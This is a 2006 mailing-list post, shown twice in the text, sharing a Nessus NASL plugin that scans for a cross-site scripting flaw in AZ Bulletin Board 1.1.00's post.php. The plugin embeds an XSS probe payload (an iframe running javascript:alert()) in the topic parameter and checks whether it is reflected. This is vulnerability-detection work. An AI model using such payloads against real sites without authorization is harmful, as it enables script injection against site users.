hi 2 all
this is my first mail.
i write script for Azbb 1.1.00 Cross_Site_Scripting vulnerability that discover by my team mate at KAPDA.
Original Advisory: http://kapda.ir/advisory-236.html
comments are welcome :)
#
# This script was written by Pedram Hayati <pi3ch at kapda dot ir>
# (C) KAPDA Computer Security Science Researchers Institute
# http://www.kapda.ir
#
# This script is released under the GNU GPL v2
if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";
script_name(english:name["english"]);
desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks post.php XSS";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");
family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if (!get_port_state(port))exit(0);
if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);
foreach dir (cgi_dirs())
{
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
security_warning(port);
exit(0);
}
}
exit(0);
Pi3cH(Pedram Hayati)
http://www.KAPDA.ir
<Computer Security Science Researchers Institute>
---------------------------------
Yahoo! Photos
Ring in the New Year with Photo Calendars. Add photos, events, holidays, whatever.
this is my first mail.
i write script for Azbb 1.1.00 Cross_Site_Scripting vulnerability that discover by my team mate at KAPDA.
Original Advisory: http://kapda.ir/advisory-236.html
comments are welcome :)
#
# This script was written by Pedram Hayati <pi3ch at kapda dot ir>
# (C) KAPDA Computer Security Science Researchers Institute
# http://www.kapda.ir
#
# This script is released under the GNU GPL v2
if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";
script_name(english:name["english"]);
desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks post.php XSS";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");
family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if (!get_port_state(port))exit(0);
if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);
foreach dir (cgi_dirs())
{
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
security_warning(port);
exit(0);
}
}
exit(0);
Pi3cH(Pedram Hayati)
http://www.KAPDA.ir
<Computer Security Science Researchers Institute>
---------------------------------
Yahoo! Photos
Ring in the New Year with Photo Calendars. Add photos, events, holidays, whatever.